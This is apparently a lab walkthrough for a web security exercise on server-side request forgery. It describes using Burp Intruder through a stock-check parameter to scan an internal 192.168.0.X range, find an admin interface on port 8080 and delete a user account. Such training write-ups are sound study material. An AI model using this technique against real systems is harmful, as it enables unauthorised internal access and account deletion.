Introduction
This lab has a stock check feature which fetches data from an internal system. To solve the lab, use the stock check functionality to scan the internal
192.168.0.Xrange for an admin interface on port 8080, then use it to delete the usercarlos.
Solution
1. Goal
Find admin interface by scanning the internal http://192.168.0.X and delete user carlos.
2. Find the request for check stock
Open the product detail on the web UI and trigger click the button Check stock
Find the request check stock in Burp Suite Proxy > HTTP history and send it to Intruder.
3. Construct Intruder Request
Now, we can construct a Sniper attack using Intruder. Because we need to scan the internal 192.168.0.X in range to find right IP for access admin interface, which we need to check 255 times.
First, change the stockUrl to http://192.168.0.1:8080 and block the last octet (which 1) in stockUrl value, add set the parameter like below:
4. Start intruder attack
After that, click Start attack button. Now it will scan the range IP from 192.168.0.1 to 192.168.0.255. The Intruder scan window will popped up and we will able to track the attack progress like in the bottom left window.
NOTE: if we doing this in Repeater it will time consuming, because we need to edit manually
255request likehttp://192.168.0.1:8080/admin,http://192.168.0.2:8080/admin, and so on…
After intruder is finished, we found that using payload 230 will return success. Which the valid host will be http://192.168.0.230:8080.
5. Delete user carlos
Now read the response body and we found url for delete user carlos.
Use it in stockApi value, and the response in success delete carlos.
Thanks for reading
